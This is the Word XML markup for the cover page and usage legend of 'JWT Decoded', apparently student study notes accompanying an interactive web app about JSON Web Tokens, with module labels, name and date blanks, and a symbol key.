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3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="500"/>
              <w:left w:type="dxa" w:w="400"/>
              <w:bottom w:type="dxa" w:w="500"/>
              <w:right w:type="dxa" w:w="400"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="96"/>
                <w:szCs w:val="96"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT DECODED</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="B0C4DE"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">Student Learning Notes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="6A9AC4"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">JSON Web Tokens — Complete Guided Study</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40"/>
        <w:gridCol w:w="3040"/>
        <w:gridCol w:w="3280"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3040"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="00875A" w:sz="4"/>
              <w:left w:val="single" w:color="00875A" w:sz="4"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="4"/>
              <w:right w:val="single" w:color="00875A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00875A"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">11 Modules</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Beginner → Advanced</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3040"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="0066CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="4"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E6F0FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0066CC"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Live App Demos</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Interactive + Visual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3280"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CC0022" w:sz="4"/>
              <w:left w:val="single" w:color="CC0022" w:sz="4"/>
              <w:bottom w:val="single" w:color="CC0022" w:sz="4"/>
              <w:right w:val="single" w:color="CC0022" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0022"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Attack Simulations</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Real Security Risks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7A849C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Name: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C5CBDA"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">_____________________________     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7A849C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Date: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="C5CBDA"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">___________________</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D1B3E" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="80"/>
          <w:szCs w:val="80"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Use These Notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">These notes are your </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">guided companion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0066CC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT Decoded interactive web app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Your teacher will demonstrate each module on screen. Your job: follow along, observe what happens, and write down your understanding in the spaces provided.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2080"/>
        <w:gridCol w:w="3280"/>
        <w:gridCol w:w="3760"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Symbol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3280"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="555555" w:sz="4"/>
              <w:left w:val="single" w:color="555555" w:sz="4"/>
              <w:bottom w:val="single" w:color="555555" w:sz="4"/>
              <w:right w:val="single" w:color="555555" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">What you should do</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">👉</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3280"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Your teacher will click / interact with the app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Watch the screen carefully, note what changes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">✏️</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">THINK ABOUT IT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A question to consider before/after the demo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Write your answer in the space provided</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2080"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">SECURITY WARNING</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3280"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">An important risk or attack scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3760"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F5F6FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Highlight or star this — it will be on the exam!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="208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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">KEY CONCEPT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A core idea you must understand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Re-read this until it is crystal clear</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Borders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
